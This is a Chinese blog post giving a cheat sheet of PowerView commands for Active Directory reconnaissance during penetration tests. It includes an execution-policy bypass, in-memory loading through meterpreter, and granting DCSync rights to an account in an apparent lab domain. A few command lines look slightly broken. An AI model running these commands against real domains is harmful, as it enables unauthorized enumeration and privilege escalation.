PowerView的使用

powerview是powershell脚本,提供了域内的一些操作的cmdlet,比较常用。

PowerSploit中的PowerView

PowerSploit是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中的信息侦测,权限提升、权限维持等。

PowerSploit项目地址:https://github.com/PowerShellMafia/PowerSploit

我们想用里面哪个脚本,就先下载该脚本,然后导入该脚本,执行其中的模块。

1
powershell -exec bypass Import-Module .\powerview.ps1; Get-NetDomain

meterpreter中可以先加载powershell模块,之后加载powershell脚本,不用上传到目标主机

1
2
3
load powershell
powershell_import powerview.ps1
powershell_execute "Get-NetDomain"

常见cmdlet

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# 查看域内详细的信息
Get-NewDomain
Get-NetForest

Get-NetDomainController # 获取域控,-Domain 指定域名

Get-NetUser # 获取域中用户信息,-Domain 指定域名
# -UserName 指定用户名
# -Unconstrained 非约束委派的用户
# -AllowDelegation 允许委派的用户
Get-NetUser | Select name # 查看所有用户名
Get-NetUser -Unconstrained | Select name # 查看所有设置了非约束委派的用户

Get-NetComputer # 获取域内计算机,-Domain 指定域名
# -FullData 返回所有信息
# -Unconstrained 过滤设置了非约束委派的机器

Get-NetGroup # 获取域中组信息
# -GroupName 过滤指定组名,支持 *admin* 形式
# -FullData 返回所有信息
# -UserName 返回用户所属组

Get-NetGroupMember #

Get-NetRDPSESSION # 获取本机的RDP连接session信息

Invoke-UserHunter # 查询指定用户登录过的机器

Invoke-EnumerateLocalAdmin # 获取管理员用户

Empire中的Powerview

常见使用

1
2
3
4
5
6
7
8
9
10
11
Get-Domain    # 获取域信息
Get-DomainController # 获取域控信息

# 给用户添加Dcsync权限
Add-DomainObjectAcl -PrincipalIdentity "XIAORANG-EXC01$" -TargetIdentity "DC=xiaorang,DC=lab" -Rights

# PowerView查询约束委派机器账户
Get-DomainComputer -TrustedToAuth -Domain xiaorang.lab

# PowerView查询约束委派服务账户
Get-DomainUser –TrustedToAuth -domain xiaorang.lab -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl

SharpView

https://github.com/tevora-threat/SharpView,csharp版本的powerview(PowerSploit),**可在域外查询**,需要指定域内用户名和密码

文章作者: Dar1in9
文章链接: http://dar1in9s.github.io/2023/05/01/内网渗透/PowerView/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Dar1in9's Blog